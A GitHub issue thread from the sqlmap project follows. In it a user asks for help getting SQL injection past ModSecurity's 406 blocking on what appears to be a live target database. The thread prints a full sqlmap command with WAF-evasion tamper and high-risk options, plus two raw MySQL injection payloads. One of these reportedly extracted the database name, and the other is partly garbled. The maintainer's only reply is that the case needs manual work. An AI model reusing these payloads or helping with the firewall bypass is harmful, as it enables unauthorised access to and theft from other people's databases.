### ISSUE TITLE
Bypass 406 error protection

### ISSUE THREAD

**Issue by LizaIbiza** [sqlmapproject/sqlmap#4324]
Currently in progress to bypass (406 unacceptable) by ModSecurity..

SQLMAP: -p "menu_id" --dbms=mysql --tamper=modsecurityversioned--level=5 --risk=3 --random-agent --threads 4 -v 3 -D expedite_database --tables --hex

Payload that worked to retreive database:

' /*!30985AND GTID_SUBSET(CONCAT(0x71786a7871,(MID((HEX(IFNULL(CAST(DATABASE() AS NCHAR),0x20))),1,92)),0x7176716a71),4518)*/-- WMAs

Payload that displayed 406:
40%27%20/*!30721AND%202814=IF((ORD(MID((SELECT%20IFNULL(CAST(COUNT(table_name)%20AS%20NCHAR),0x20)%/**/.TABES%20WHERE%20table_schema=0x65787065646974655f6461746162617365),1,1))>51),SLEEP(5),2814)*/--%20fuwK

I went to try tampering with it, and I noticed it works fine without including "SLEEP(5)" , I'm not sure if its the problem though. Is there any way to reterive tables ?

Thank you.

**Comment by epril1** [comment]
menu_epril1 --dbms=mysql --tamper=modsecurityversioned--level=5 --risk=3 --random-agent --threads 4 -v 3 -D expedite_database --tables --hex

**Comment by stamparm** [comment]
Sorry, this looks like more a manual work than for sqlmap. ModSecurity is nowadays really doing well against automated attacks
